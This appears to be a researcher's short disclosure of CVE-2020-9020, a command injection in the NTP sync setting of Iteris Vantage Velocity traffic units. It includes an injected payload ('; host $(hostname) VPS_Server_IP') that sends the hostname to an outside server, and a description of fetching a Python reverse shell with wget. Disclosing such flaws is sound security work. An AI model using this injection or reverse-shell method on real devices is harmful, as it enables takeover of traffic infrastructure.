[ITERIS] - Vantage Velocity Field Unit - Os Code Injection - (CVE-2020-9020)

 

                             

More information about the device: https://www.iteris.com/products/travel-time/vantage-velocity

Affected Versions:

• 2.3.1
• 2.4.2 
• 3.0

Shodan:

Surfing the internet I found this device that I did not know, and that turned out to be quite interesting. In the first instance what I see is a menu called "Time Settings", inside it, there is a function called "Synchronize With NTP Server", so I imagine that behind it ran something similar to an "ntpdate -u ntp.server. com "for example. so I decided to try the classic ";" and concatenate a new command, in this case a "host $ (hostname) VPS_Server_IP" and on my DNS server I get to the hostname of the device, which confirms that it was possible to execute commands.

Getting hostname

Getting the name of the user I control

Once I could confirm that it is possible to execute a command, you have to try to get a reverse shell. So I use the "wget" command to download a python revershell to take full control of the system

Revershell execution and the device is compromised

CVE-2020-9020

By: @linuxmonr4